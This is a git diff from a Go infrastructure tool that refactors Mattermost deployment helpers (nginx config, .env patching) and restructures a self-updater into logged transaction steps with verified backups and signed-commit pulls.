- # WebSocket support
- location ~ /api/v[0-9]+/(users/)?websocket$ {
- proxy_set_header Upgrade $http_upgrade;
- proxy_set_header Connection "upgrade";
- proxy_set_header Host $host;
- proxy_set_header X-Real-IP $remote_addr;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-Forwarded-Proto $scheme;
- proxy_set_header X-Frame-Options SAMEORIGIN;
- proxy_buffers 256 16k;
- proxy_buffer_size 16k;
- client_body_timeout 60;
- send_timeout 300;
- lingering_timeout 5;
- proxy_connect_timeout 90;
- proxy_send_timeout 300;
- proxy_read_timeout 90s;
- proxy_pass http://mattermost_backend;
- }
-
- # Main application
- location / {
- proxy_pass http://mattermost_backend;
- proxy_set_header Host $host;
- proxy_set_header X-Real-IP $remote_addr;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-Forwarded-Proto $scheme;
- proxy_set_header X-Frame-Options SAMEORIGIN;
-
- # Timeouts
- proxy_connect_timeout 60s;
- proxy_send_timeout 60s;
- proxy_read_timeout 60s;
- }
-
- # Health check endpoint
- location /health {
- access_log off;
- return 200 "healthy\n";
- add_header Content-Type text/plain;
- }
- }
-}
-`, m.config.Domain, m.config.Domain)
-}
-
-// Helper functions for pointer conversion
-func stringPtr(s string) *string {
- return &s
-}
-
-func intPtr(i int) *int {
- return &i
-}
diff --git a/pkg/mattermost/patch.go b/pkg/mattermost/patch.go
index 1ba450f93..87f95875c 100644
--- a/pkg/mattermost/patch.go
+++ b/pkg/mattermost/patch.go
@@ -1,7 +1,8 @@
+// patch.go - .env file patching for Mattermost Docker Compose deployments.
+
package mattermost
import (
- "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
"bufio"
"fmt"
"os"
@@ -9,46 +10,47 @@ import (
"strings"
)
-// PatchMattermostEnv copies and updates the .env file with Eos-standard values.
-func PatchMattermostEnv(cloneDir string) error {
- src := filepath.Join(cloneDir, "env.example")
- dst := filepath.Join(cloneDir, ".env")
+// PatchMattermostEnv copies env.example to .env and applies Eos-standard overrides.
+// Idempotent: only copies env.example if .env doesn't already exist.
+func PatchMattermostEnv(baseDir string) error {
+ src := filepath.Join(baseDir, EnvExampleFileName)
+ dst := filepath.Join(baseDir, EnvFileName)
// Only copy if not already present
if _, err := os.Stat(dst); os.IsNotExist(err) {
input, err := os.ReadFile(src)
if err != nil {
- return fmt.Errorf("read env.example: %w", err)
+ return fmt.Errorf("read %s: %w", EnvExampleFileName, err)
}
- if err := os.WriteFile(dst, input, shared.ConfigFilePerm); err != nil {
- return fmt.Errorf("write .env: %w", err)
+ if err := os.WriteFile(dst, input, EnvFilePerm); err != nil {
+ return fmt.Errorf("write %s: %w", EnvFileName, err)
}
}
- // Patch domain and port
- return patchEnvInPlace(dst, DefaultEnvUpdates)
+ return patchEnvInPlace(dst, DefaultEnvOverrides)
}
+// patchEnvInPlace reads an .env file and replaces matching key=value lines.
+// Both active (KEY=value) and commented (#KEY=value) lines are matched.
+// Keys not found in the file are appended at the end.
func patchEnvInPlace(path string, updates map[string]string) error {
file, err := os.Open(path)
if err != nil {
- return err
+ return fmt.Errorf("open %s: %w", path, err)
}
- defer func() {
- if err := file.Close(); err != nil {
- // Log silently as this is a file operation utility
- _ = err
- }
- }()
+ defer file.Close()
var newLines []string
scanner := bufio.NewScanner(file)
+ // Track which keys were found and replaced
+ applied := make(map[string]bool, len(updates))
for scanner.Scan() {
line := scanner.Text()
for key, val := range updates {
if strings.HasPrefix(line, key+"=") || strings.HasPrefix(line, "#"+key+"=") {
line = fmt.Sprintf("%s=%s", key, val)
+ applied[key] = true
break
}
}
@@ -56,8 +58,15 @@ func patchEnvInPlace(path string, updates map[string]string) error {
}
if err := scanner.Err(); err != nil {
- return err
+ return fmt.Errorf("scan %s: %w", path, err)
+ }
+
+ // Append any keys that weren't found in the existing file
+ for key, val := range updates {
+ if !applied[key] {
+ newLines = append(newLines, fmt.Sprintf("%s=%s", key, val))
+ }
}
- return os.WriteFile(path, []byte(strings.Join(newLines, "\n")+"\n"), shared.ConfigFilePerm)
+ return os.WriteFile(path, []byte(strings.Join(newLines, "\n")+"\n"), EnvFilePerm)
}
diff --git a/pkg/mattermost/types.go b/pkg/mattermost/types.go
deleted file mode 100644
index f4e951fdb..000000000
--- a/pkg/mattermost/types.go
+++ /dev/null
@@ -1,191 +0,0 @@
-// pkg/mattermost/types.go
-
-package mattermost
-
-import (
- "context"
- "fmt"
- "time"
-
- "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
- "github.com/hashicorp/nomad/api"
- vault "github.com/hashicorp/vault/api"
-)
-
-// Config holds the configuration for Mattermost deployment
-type Config struct {
- // Database configuration
- PostgresUser string `yaml:"postgres_user" json:"postgres_user"`
- PostgresPassword string `yaml:"postgres_password" json:"postgres_password"`
- PostgresDB string `yaml:"postgres_db" json:"postgres_db"`
- PostgresHost string `yaml:"postgres_host" json:"postgres_host"`
- PostgresPort int `yaml:"postgres_port" json:"postgres_port"`
-
- // Network configuration
- Port int `yaml:"port" json:"port"`
- Host string `yaml:"host" json:"host"`
- Domain string `yaml:"domain" json:"domain"`
- Protocol string `yaml:"protocol" json:"protocol"`
-
- // Deployment configuration
- Datacenter string `yaml:"datacenter" json:"datacenter"`
- Environment string `yaml:"environment" json:"environment"`
- DataPath string `yaml:"data_path" json:"data_path"`
- Replicas int `yaml:"replicas" json:"replicas"`
-
- // Resource limits
- CPU int `yaml:"cpu" json:"cpu"` // MHz
- Memory int `yaml:"memory" json:"memory"` // MB
-
- // External service addresses
- NomadAddr string `yaml:"nomad_addr" json:"nomad_addr"`
- VaultAddr string `yaml:"vault_addr" json:"vault_addr"`
- VaultToken string `yaml:"vault_token" json:"vault_token"`
-
- // Security keys
- FilePublicKey string `yaml:"file_public_key" json:"file_public_key"`
- FilePrivateKey string `yaml:"file_private_key" json:"file_private_key"`
- Invite string `yaml:"invite_" json:"invite_"`
-
- // Support configuration
- SupportEmail string `yaml:"support_email" json:"support_email"`
-
- // Security
- Timezone string `yaml:"timezone" json:"timezone"`
-}
-
-// DeploymentStatus represents the status of a deployment step
-type DeploymentStatus struct {
- Step string `json:"step"`
- Success bool `json:"success"`
- Message string `json:"message"`
- Timestamp time.Time `json:"timestamp"`
- Details map[string]interface{} `json:"details,omitempty"`
-}
-
-// Manager handles Mattermost deployment operations
-type Manager struct {
- config *Config
- nomadClient *api.Client
- vaultClient *vault.Client
- statusChan chan DeploymentStatus
-}
-
-// DeploymentStep represents a single deployment step
-type DeploymentStep struct {
- Name string
- Description string
- AssessFunc func(ctx context.Context, mgr *Manager) error
- InterventFunc func(ctx context.Context, mgr *Manager) error
- EvaluateFunc func(ctx context.Context, mgr *Manager) error
-}
-
-// ErrorType defines types of deployment errors
-type ErrorType int
-
-const (
- ErrorTypePrerequisite ErrorType = iota
- ErrorTypeVault
- ErrorTypeNomad
- ErrorTypeValidation
- ErrorTypeTimeout
- ErrorTypeUnknown
-)
-
-// DeploymentError represents a deployment error with context
-type DeploymentError struct {
- Type ErrorType
- Step string
- Message string
- Cause error
- Details map[string]interface{}
-}
-
-func (e *DeploymentError) Error() string {
- if e.Cause != nil {
- return e.Message + ": " + e.Cause.Error()
- }
- return e.Message
-}
-
-// DefaultConfig returns a default Mattermost configuration
-func DefaultConfig() *Config {
- return &Config{
- Port: 8065,
- Host: "0.0.0.0",
- Protocol: "https",
- PostgresDB: "mattermost",
- PostgresHost: "postgres",
- PostgresPort: 5432,
- NomadAddr: "http://localhost:4646",
- VaultAddr: fmt.Sprintf("http://localhost:%d", shared.PortVault),
- Datacenter: "dc1",
- Environment: "development",
- DataPath: "/opt/mattermost/data",
- Replicas: 1,
- CPU: 1000,
- Memory: 2048,
- SupportEmail: "support@example.com",
- Timezone: "UTC",
- }
-}
-
-// Validate validates the configuration
-func (c *Config) Validate() error {
- if c.Port <= 0 || c.Port > 65535 {
- return &DeploymentError{
- Type: ErrorTypeValidation,
- Step: "config_validation",
- Message: "invalid port number",
- Details: map[string]interface{}{"port": c.Port},
- }
- }
-
- if c.Host == "" {
- return &DeploymentError{
- Type: ErrorTypeValidation,
- Step: "config_validation",
- Message: "host cannot be empty",
- }
- }
-
- if c.Domain == "" {
- return &DeploymentError{
- Type: ErrorTypeValidation,
- Step: "config_validation",
- Message: "domain cannot be empty",
- }
- }
-
- if c.FilePublicKey == "" {
- return &DeploymentError{
- Type: ErrorTypeValidation,
- Step: "config_validation",
- Message: "file public key cannot be empty",
- }
- }
-
- if c.Replicas < 1 {
- return &DeploymentError{
- Type: ErrorTypeValidation,
- Step: "config_validation",
- Message: "replica count must be at least 1",
- Details: map[string]interface{}{"replicas": c.Replicas},
- }
- }
-
- return nil
-}
-
-// DirNames lists the required subdirectories for Mattermost volumes.
-var DirNames = []string{
- "config", "data", "logs", "plugins", "client/plugins", "bleve-indexes",
-}
-
-// DefaultEnvUpdates holds the standard .env key/value overrides
-// for our internal Mattermost deployment (legacy Docker Compose support).
-var DefaultEnvUpdates = map[string]string{
- "DOMAIN": "localhost",
- "PORT": "8017",
- "MM_SUPPORTSETTINGS_SUPPORTEMAIL": "support@cybermonkey.net.au",
-}
diff --git a/pkg/self/updater.go b/pkg/self/updater.go
index c1440d7cd..bb3b0ebe0 100644
--- a/pkg/self/updater.go
+++ b/pkg/self/updater.go
@@ -1,7 +1,6 @@
package self
import (
- "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
"fmt"
"os"
"os/exec"
@@ -11,6 +10,8 @@ import (
"time"
"github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/git"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
"github.com/uptrace/opentelemetry-go-extra/otelzap"
"go.uber.org/zap"
)
@@ -198,24 +199,13 @@ func (eu *EosUpdater) CleanupOldBackups() {
}
}
-// PullLatestCode pulls the latest code from git
+// PullLatestCode pulls the latest code from git.
+// Delegates to pkg/git.PullLatestCode which includes:
+// - Trusted remote verification (security)
+// - Credential checking (UX)
+// - GIT_TERMINAL_PROMPT safety (non-interactive safety)
func (eu *EosUpdater) PullLatestCode() error {
- eu.logger.Info("Pulling latest changes from git repository",
- zap.String("branch", eu.config.GitBranch))
-
- // Use --autostash to automatically handle uncommitted changes
- // This is more reliable than manual stashing and prevents orphaned stashes
- cmd := exec.Command("git", "-C", eu.config.SourceDir, "pull", "--autostash", "origin", eu.config.GitBranch)
- output, err := cmd.CombinedOutput()
- if err != nil {
- eu.logger.Error("Git pull failed",
- zap.Error(err),
- zap.String("output", string(output)))
- return fmt.Errorf("git pull failed: %w", err)
- }
-
- eu.logger.Info("Git pull completed", zap.String("output", strings.TrimSpace(string(output))))
- return nil
+ return git.PullLatestCode(eu.rc, eu.config.SourceDir, eu.config.GitBranch)
}
// BuildBinary builds the new Eos binary to a temporary location
diff --git a/pkg/self/updater_enhanced.go b/pkg/self/updater_enhanced.go
index 05b9aafb5..03af0f3c2 100644
--- a/pkg/self/updater_enhanced.go
+++ b/pkg/self/updater_enhanced.go
@@ -36,6 +36,17 @@ type UpdateTransaction struct {
ChangesPulled bool
BinaryInstalled bool
Success bool
+ SkipReason string
+ Steps []UpdateStepResult
+}
+
+// UpdateStepResult captures a transaction step for structured logging and postmortem review.
+type UpdateStepResult struct {
+ Name string
+ Status string
+ Message string
+ Duration time.Duration
+ OccurredAt time.Time
}
// EnhancedUpdateConfig extends UpdateConfig with safety features
@@ -78,6 +89,43 @@ func NewEnhancedEosUpdater(rc *eos_io.RuntimeContext, config *EnhancedUpdateConf
}
}
+func (eeu *EnhancedEosUpdater) recordTransactionStep(name, status, message string, started time.Time) {
+ result := UpdateStepResult{
+ Name: name,
+ Status: status,
+ Message: message,
+ Duration: time.Since(started),
+ OccurredAt: started.UTC(),
+ }
+ eeu.transaction.Steps = append(eeu.transaction.Steps, result)
+ eeu.logger.Info("Self-update transaction step",
+ zap.String("event", "self_update.transaction.step"),
+ zap.String("step", result.Name),
+ zap.String("status", result.Status),
+ zap.String("message", result.Message),
+ zap.Duration("duration", result.Duration),
+ zap.Time("started_at", result.OccurredAt))
+}
+
+func (eeu *EnhancedEosUpdater) runTransactionStep(name, message string, fn func() error) error {
+ started := time.Now()
+ eeu.logger.Info("Starting self-update transaction step",
+ zap.String("event", "self_update.transaction.step.start"),
+ zap.String("step", name),
+ zap.String("message", message))
+ if err := fn(); err != nil {
+ eeu.recordTransactionStep(name, "failed", err.Error(), started)
+ return err
+ }
+ eeu.recordTransactionStep(name, "completed", message, started)
+ return nil
+}
+
+func (eeu *EnhancedEosUpdater) skipTransactionStep(name, message string) {
+ started := time.Now()
+ eeu.recordTransactionStep(name, "skipped", message, started)
+}
+
// UpdateWithRollback performs update with automatic rollback on failure
func (eeu *EnhancedEosUpdater) UpdateWithRollback() error {
eeu.logger.Info(" Starting enhanced self-update with rollback capability")
@@ -144,54 +192,34 @@ func (eeu *EnhancedEosUpdater) UpdateWithRollback() error {
eeu.logger.Info(" Enhanced self-update completed successfully",
zap.Duration("duration", time.Since(eeu.transaction.StartTime)))
- // Display clear success summary to user
- fmt.Println()
- fmt.Println("════════════════════════════════════════════════════════════════")
+ // Display clear success summary to user via structured logging
if eeu.transaction.BinaryInstalled {
- // Show before/after commit hashes (first 8 chars)
afterCommit := "unknown"
if currentCommit, err := git.GetCurrentCommit(eeu.rc, eeu.config.SourceDir); err == nil {
afterCommit = currentCommit
}
- if len(eeu.transaction.GitCommitBefore) >= 8 && len(afterCommit) >= 8 {
- fmt.Printf("Update complete: %s → %s\n",
- eeu.transaction.GitCommitBefore[:8],
- afterCommit[:8])
- } else {
- fmt.Println("Update complete")
- }
+ eeu.logger.Info("Update complete",
+ zap.String("from", truncateCommit(eeu.transaction.GitCommitBefore)),
+ zap.String("to", truncateCommit(afterCommit)))
} else {
- // Already on latest version
- if len(eeu.transaction.GitCommitBefore) >= 8 {
- fmt.Printf("Already on latest version: %s\n",
- eeu.transaction.GitCommitBefore[:8])
- } else {
- fmt.Println("Already on latest version")
- }
+ eeu.logger.Info("Already on latest version",
+ zap.String("commit", truncateCommit(eeu.transaction.GitCommitBefore)))
}
- // Show what was updated
if eeu.enhancedConfig.UpdateSystemPackages {
- fmt.Println(" System packages: Updated")
+ eeu.logger.Info("System packages updated")
}
if eeu.enhancedConfig.UpdateGoVersion {
- fmt.Println(" Go compiler: Updated")
+ eeu.logger.Info("Go compiler updated")
}
- fmt.Println("════════════════════════════════════════════════════════════════")
- fmt.Println()
-
// Check for running processes - use existing pattern
if eeu.enhancedConfig.CheckRunningProcesses {
- // Use WarnAboutRunningProcesses which already checks and logs
if err := process.WarnAboutRunningProcesses(eeu.rc, "eos"); err == nil {
- fmt.Println("")
- fmt.Println("Restart running eos processes to use new version")
+ eeu.logger.Info("Restart running eos processes to use new version")
}
}
- fmt.Println()
-
return nil
}
@@ -340,30 +368,10 @@ func (eeu *EnhancedEosUpdater) checkGitRepositoryState() error {
}
// Interactive mode - prompt for informed consent
- fmt.Println()
- fmt.Println("═══════════════════════════════════════════════════════════════")
- fmt.Println("⚠️ WARNING: Uncommitted Changes Detected")
- fmt.Println("═══════════════════════════════════════════════════════════════")
- fmt.Println()
- fmt.Printf("Repository: %s\n", eeu.config.SourceDir)
- fmt.Println()
- fmt.Println("You have uncommitted changes in your Eos source directory.")
- fmt.Println()
- fmt.Println("RISKS:")
- fmt.Println(" • If the update fails, your changes will be preserved BUT")
- fmt.Println(" • The repository will be in an inconsistent state")
- fmt.Println(" • Rollback will restore your changes, but this adds complexity")
- fmt.Println()
- fmt.Println("SAFER OPTIONS:")
- fmt.Println(" 1. Cancel now, commit your changes, then re-run update")
- fmt.Println(" 2. Cancel now, stash your changes, then re-run update")
- fmt.Println(" 3. Cancel now, discard your changes, then re-run update")
- fmt.Println()
- fmt.Println("OR:")
- fmt.Println(" 4. Continue at your own risk (changes will be auto-stashed)")
- fmt.Println()
- fmt.Println("═══════════════════════════════════════════════════════════════")
- fmt.Println()
+ eeu.logger.Warn("Uncommitted changes detected - user consent required",
+ zap.String("repo", eeu.config.SourceDir))
+ eeu.logger.Info("RISKS: If the update fails, changes are preserved but repository will be in inconsistent state. Rollback restores changes but adds complexity")
+ eeu.logger.Info("SAFER OPTIONS: (1) Cancel, commit changes, re-run; (2) Cancel, stash, re-run; (3) Cancel, discard, re-run; (4) Continue (changes auto-stashed)")
// Use interaction package for consistent prompting
// Default to NO (safer option)
@@ -386,11 +394,8 @@ func (eeu *EnhancedEosUpdater) checkGitRepositoryState() error {
}
// User chose to continue - warn and proceed
- eeu.logger.Warn("User chose to proceed with uncommitted changes",
+ eeu.logger.Warn("User chose to proceed with uncommitted changes - auto-stashing",
zap.String("repo", eeu.config.SourceDir))
- fmt.Println()
- fmt.Println("Proceeding with update (uncommitted changes will be auto-stashed)...")
- fmt.Println()
// Note: P0-2 already implemented stash tracking, so this is now safe
// Changes will be stashed before pull and restored if rollback needed
@@ -526,7 +531,7 @@ func (eeu *EnhancedEosUpdater) recordGitState() error {
}
eeu.transaction.GitCommitBefore = commitHash
- eeu.logger.Info("Git state recorded", zap.String("commit", commitHash[:8]))
+ eeu.logger.Info("Git state recorded", zap.String("commit", truncateCommit(commitHash)))
return nil
}
@@ -691,72 +696,64 @@ func (eeu *EnhancedEosUpdater) executeUpdateTransaction() error {
defer updateLock.Release()
eeu.logger.Debug("Update lock acquired - safe to proceed with transaction")
- // Step 1: Create binary backup and record current binary hash
- currentHash, err := eeu.createTransactionBackup()
- if err != nil {
- return fmt.Errorf("failed to create backup: %w", err)
+ var currentHash string
+ if err := eeu.runTransactionStep("pull_source", "Pull latest source changes", func() error {
+ codeChanged, pullErr := eeu.pullLatestCodeWithVerification()
+ if pullErr != nil {
+ return fmt.Errorf("failed to pull latest code: %w", pullErr)
+ }
+ eeu.transaction.ChangesPulled = codeChanged
+ return nil
+ }); err != nil {
+ return err
}
- // Step 2: Pull latest code
- codeChanged, err := eeu.pullLatestCodeWithVerification()
- if err != nil {
- return fmt.Errorf("failed to pull latest code: %w", err)
+ buildNeeded, reason := eeu.shouldBuildBinary()
+ if !buildNeeded {
+ eeu.transaction.SkipReason = reason
+ eeu.skipTransactionStep("build_binary", reason)
+ eeu.logger.Info("terminal prompt: ✓ Already on latest version - no rebuild needed")
+ return nil
}
- eeu.transaction.ChangesPulled = codeChanged
-
- // Check if binary needs rebuilding by comparing embedded commit vs source HEAD
- // This is the key fix: even if git pull returns no changes (already up-to-date),
- // the binary might have been built from an older commit
- sourceCommit, err := git.GetCurrentCommit(eeu.rc, eeu.config.SourceDir)
- if err != nil {
- eeu.logger.Warn("Could not get source commit for comparison", zap.Error(err))
- // Continue with rebuild to be safe
- } else {
- binaryCommit := shared.BuildCommit
- eeu.logger.Info("Comparing binary vs source commit",
- zap.String("binary_commit", truncateCommit(binaryCommit)),
- zap.String("source_commit", truncateCommit(sourceCommit)))
-
- // If binary was built from same commit as source HEAD, skip rebuild
- if binaryCommit != "" && binaryCommit == sourceCommit {
- eeu.logger.Info(" Binary is built from current source commit, skipping rebuild",
- zap.String("commit", truncateCommit(sourceCommit)))
- eeu.logger.Info("terminal prompt: ✓ Already on latest version - no rebuild needed")
- return nil
- }
- // Binary needs rebuild - either no commit embedded or commits don't match
- if binaryCommit == "" {
- eeu.logger.Info(" Binary has no embedded commit (development build), rebuilding",
- zap.String("source_commit", truncateCommit(sourceCommit)))
- } else {
- eeu.logger.Info(" Binary commit differs from source, rebuilding",
- zap.String("binary_commit", truncateCommit(binaryCommit)),
- zap.String("source_commit", truncateCommit(sourceCommit)))
+ if err := eeu.runTransactionStep("hash_current_binary", "Hash currently installed binary", func() error {
+ hash, hashErr := crypto.HashFile(eeu.config.BinaryPath)
+ if hashErr != nil {
+ return fmt.Errorf("failed to hash current binary: %w", hashErr)
}
+ currentHash = hash
+ eeu.logger.Info("Current binary metadata",
+ zap.String("event", "self_update.binary.current"),
+ zap.String("sha256", currentHash[:16]+"..."))
+ return nil
+ }); err != nil {
+ return err
}
- // Step 3: Build new binary
- eeu.logger.Info(" Building new binary from source")
- tempBinary, err := eeu.BuildBinary()
- if err != nil {
- return fmt.Errorf("failed to build new binary: %w", err)
+ if err := eeu.runTransactionStep("build_binary", "Build new eos binary from source", func() error {
+ tempBinary, buildErr := eeu.BuildBinary()
+ if buildErr != nil {
+ return fmt.Errorf("failed to build new binary: %w", buildErr)
+ }
+ eeu.transaction.TempBinaryPath = tempBinary
+ return nil
+ }); err != nil {
+ return err
}
- eeu.transaction.TempBinaryPath = tempBinary
- // Step 3a: Compare new binary hash with current binary hash
- newHash, err := crypto.HashFile(tempBinary)
+ newHash, err := crypto.HashFile(eeu.transaction.TempBinaryPath)
if err != nil {
return fmt.Errorf("failed to hash new binary: %w", err)
}
if newHash == currentHash {
+ eeu.transaction.SkipReason = "built binary matches installed binary"
eeu.logger.Info(" New binary is identical to current binary (SHA256 match)",
zap.String("sha256", newHash[:16]+"..."))
eeu.logger.Info("terminal prompt: ✓ Binary unchanged - no update needed")
-
- // Clean up temp binary
- _ = os.Remove(tempBinary)
+ _ = os.Remove(eeu.transaction.TempBinaryPath)
+ eeu.skipTransactionStep("backup_binary", "Skipped backup because install was not required")
+ eeu.skipTransactionStep("install_binary", eeu.transaction.SkipReason)
return nil
}
@@ -764,28 +761,84 @@ func (eeu *EnhancedEosUpdater) executeUpdateTransaction() error {
zap.String("old_sha256", currentHash[:16]+"..."),
zap.String("new_sha256", newHash[:16]+"..."))
- // Step 4: Validate new binary
+ if err := eeu.runTransactionStep("backup_binary", "Create verified rollback backup of installed binary", func() error {
+ backupHash, backupErr := eeu.createTransactionBackup()
+ if backupErr != nil {
+ return fmt.Errorf("failed to create backup: %w", backupErr)
+ }
+ if backupHash != currentHash {
+ return fmt.Errorf("backup hash mismatch with current binary hash")
+ }
+ return nil
+ }); err != nil {
+ return err
+ }
+
if !eeu.config.SkipValidation {
- if err := eeu.ValidateBinary(tempBinary); err != nil {
- return fmt.Errorf("new binary validation failed: %w", err)
+ if err := eeu.runTransactionStep("validate_binary", "Validate newly built binary", func() error {
+ if validateErr := eeu.ValidateBinary(eeu.transaction.TempBinaryPath); validateErr != nil {
+ return fmt.Errorf("new binary validation failed: %w", validateErr)
+ }
+ return nil
+ }); err != nil {
+ return err
}
+ } else {
+ eeu.skipTransactionStep("validate_binary", "Binary validation skipped by configuration")
}
- // Step 5: Install new binary atomically
- if err := eeu.installBinaryAtomic(tempBinary); err != nil {
- return fmt.Errorf("failed to install new binary: %w", err)
+ if err := eeu.runTransactionStep("install_binary", "Install binary atomically", func() error {
+ if installErr := eeu.installBinaryAtomic(eeu.transaction.TempBinaryPath); installErr != nil {
+ return fmt.Errorf("failed to install new binary: %w", installErr)
+ }
+ eeu.transaction.BinaryInstalled = true
+ return nil
+ }); err != nil {
+ return err
}
- eeu.transaction.BinaryInstalled = true
- // Step 6: Verify installed binary
- if err := eeu.Verify(); err != nil {
- return fmt.Errorf("installed binary verification failed: %w", err)
+ if err := eeu.runTransactionStep("verify_install", "Verify installed binary", func() error {
+ if verifyErr := eeu.Verify(); verifyErr != nil {
+ return fmt.Errorf("installed binary verification failed: %w", verifyErr)
+ }
+ return nil
+ }); err != nil {
+ return err
}
eeu.logger.Info(" Update transaction completed successfully")
return nil
}
+func (eeu *EnhancedEosUpdater) shouldBuildBinary() (bool, string) {
+ sourceCommit, err := git.GetCurrentCommit(eeu.rc, eeu.config.SourceDir)
+ if err != nil {
+ eeu.logger.Warn("Could not get source commit for comparison", zap.Error(err))
+ return true, "source commit unavailable; rebuilding defensively"
+ }
+
+ binaryCommit := shared.BuildCommit
+ eeu.logger.Info("Comparing binary vs source commit",
+ zap.String("event", "self_update.binary.compare"),
+ zap.String("binary_commit", truncateCommit(binaryCommit)),
+ zap.String("source_commit", truncateCommit(sourceCommit)))
+
+ if binaryCommit != "" && binaryCommit == sourceCommit {
+ return false, "installed binary already matches source commit"
+ }
+
+ if binaryCommit == "" {
+ eeu.logger.Info(" Binary has no embedded commit (development build), rebuilding",
+ zap.String("source_commit", truncateCommit(sourceCommit)))
+ } else {
+ eeu.logger.Info(" Binary commit differs from source, rebuilding",
+ zap.String("binary_commit", truncateCommit(binaryCommit)),
+ zap.String("source_commit", truncateCommit(sourceCommit)))
+ }
+
+ return true, "installed binary commit differs from source commit"
+}
+
// createTransactionBackup creates a backup with transaction metadata and returns current binary hash
// ARCHITECTURAL FIX (Adversarial Analysis Round 4): Use file descriptors to eliminate ALL TOCTOU
//
@@ -912,27 +965,14 @@ func (eeu *EnhancedEosUpdater) createTransactionBackup() (string, error) {
currentSize, backupFdStat.Size())
}
- // Phase 8: Verify backup hash by re-reading from the SAME FD
- // P0 FIX: Check Seek() error - unchecked seek can cause silent data corruption
- if _, err := backupFd.Seek(0, 0); err != nil {
- _ = os.Remove(expectedBackupPath)
- return "", fmt.Errorf("failed to rewind backup file for verification: %w\n"+
- "This could indicate:\n"+
- " 1. File descriptor corruption\n"+
- " 2. Filesystem errors\n"+
- " 3. File was deleted during write", err)
- }
-
- backupData := make([]byte, currentSize)
- defer func() { backupData = nil }() // P1 FIX: Explicit hint to GC for large allocations
-
- n, err = backupFd.Read(backupData)
- if err != nil || int64(n) != currentSize {
+ // Phase 8: Verify backup hash using streaming hash (avoids double memory allocation)
+ // Close the FD first so HashFile can open it independently
+ backupFd.Close()
+ backupHash, err := crypto.HashFile(expectedBackupPath)
+ if err != nil {
_ = os.Remove(expectedBackupPath)
- return "", fmt.Errorf("failed to re-read backup for verification: %w", err)
+ return "", fmt.Errorf("failed to hash backup for verification: %w", err)
}
-
- backupHash := crypto.HashData(backupData)
if backupHash != currentHash {
_ = os.Remove(expectedBackupPath)
return "", fmt.Errorf("backup hash mismatch after write\n"+
@@ -946,9 +986,8 @@ func (eeu *EnhancedEosUpdater) createTransactionBackup() (string, error) {
currentHash[:16]+"...", backupHash[:16]+"...")
}
- // Explicit memory cleanup - we've verified backup, don't need data anymore
+ // Release source data - backup is verified
binaryData = nil
- backupData = nil
eeu.logger.Info("Transaction backup created and verified via FD operations",
zap.String("path", expectedBackupPath),
@@ -962,21 +1001,28 @@ func (eeu *EnhancedEosUpdater) createTransactionBackup() (string, error) {
// P0-2 FIX: Uses manual stash management to track stash ref for rollback
// Returns true if code changed, false if already up-to-date
func (eeu *EnhancedEosUpdater) pullLatestCodeWithVerification() (bool, error) {
- // Use stash tracking version for rollback safety
- codeChanged, stashRef, err := git.PullWithStashTracking(eeu.rc, eeu.config.SourceDir, eeu.config.GitBranch)
+ result, err := git.PullRepository(eeu.rc, eeu.config.SourceDir, eeu.config.GitBranch, git.PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ TrackRollbackStash: true,
+ VerifyCommitSignatures: true,
+ NormalizeOwnershipForSudo: true,
+ RecoverMergeConflicts: true,
+ FetchFirst: true,
+ })
if err != nil {
return false, err
}
// Store stash ref in transaction for rollback
- eeu.transaction.GitStashRef = stashRef
+ eeu.transaction.GitStashRef = result.StashRef
- if stashRef != "" {
+ if result.StashRef != "" {
eeu.logger.Info("Stash tracked in transaction for rollback",
- zap.String("ref", stashRef[:8]+"..."))
+ zap.String("ref", truncateCommit(result.StashRef)))
}
- return codeChanged, nil
+ return result.CodeChanged, nil
}
// installBinaryAtomic installs the binary atomically with flock-based locking
@@ -1169,7 +1215,7 @@ func (eeu *EnhancedEosUpdater) Rollback() error {
}
eeu.logger.Info("Reverting git repository to previous commit",
- zap.String("commit", eeu.transaction.GitCommitBefore[:8]))
+ zap.String("commit", truncateCommit(eeu.transaction.GitCommitBefore)))
// SAFETY: Only do hard reset if we have a stash OR working tree is clean
// This prevents destroying uncommitted work if stash creation failed
@@ -1242,7 +1288,7 @@ func (eeu *EnhancedEosUpdater) Rollback() error {
}
eeu.logger.Info("Restoring uncommitted changes from stash",
- zap.String("ref", eeu.transaction.GitStashRef[:8]+"..."))
+ zap.String("ref", truncateCommit(eeu.transaction.GitStashRef)))
// Use helper function from git package
if err := git.RestoreStash(eeu.rc, eeu.config.SourceDir, eeu.transaction.GitStashRef); err != nil {
@@ -1250,7 +1296,7 @@ func (eeu *EnhancedEosUpdater) Rollback() error {
// Stash is still preserved for manual recovery
eeu.logger.Warn("Failed to restore stash automatically",
zap.Error(err),
- zap.String("stash_ref", eeu.transaction.GitStashRef[:8]+"..."))
+ zap.String("stash_ref", truncateCommit(eeu.transaction.GitStashRef)))
return fmt.Errorf("failed to restore stash (stash preserved): %w\n\n"+
"Your uncommitted changes are saved in stash.\n"+
"Manual recovery:\n"+
@@ -1395,6 +1441,14 @@ func (eeu *EnhancedEosUpdater) PostUpdateCleanup() error {
// Note: We no longer manually manage stash - git pull --autostash handles it automatically
// This prevents orphaned stashes and merge conflicts
+ for _, step := range eeu.transaction.Steps {
+ eeu.logger.Debug("Transaction step summary",
+ zap.String("step", step.Name),
+ zap.String("status", step.Status),
+ zap.String("message", step.Message),
+ zap.Duration("duration", step.Duration))
+ }
+
return nil
}
@@ -1419,34 +1473,9 @@ func (eeu *EnhancedEosUpdater) UpdateSystemPackages() error {
}
// Explain what will happen
- eeu.logger.Info("System package update available")
- fmt.Println("\nEos can update your system packages to ensure build dependencies are current.")
- fmt.Println("")
- fmt.Printf("Package manager: %s\n", packageManager)
- fmt.Println("")
- fmt.Println("This will run:")
-
- switch packageManager {
- case system.PackageManagerApt:
- fmt.Println(" 1. sudo apt update (refresh package lists)")
- fmt.Println(" 2. sudo apt upgrade -y (install updates)")
- fmt.Println(" 3. sudo apt autoremove -y (remove old packages)")
- case system.PackageManagerYum:
- fmt.Println(" 1. sudo yum update -y (update packages)")
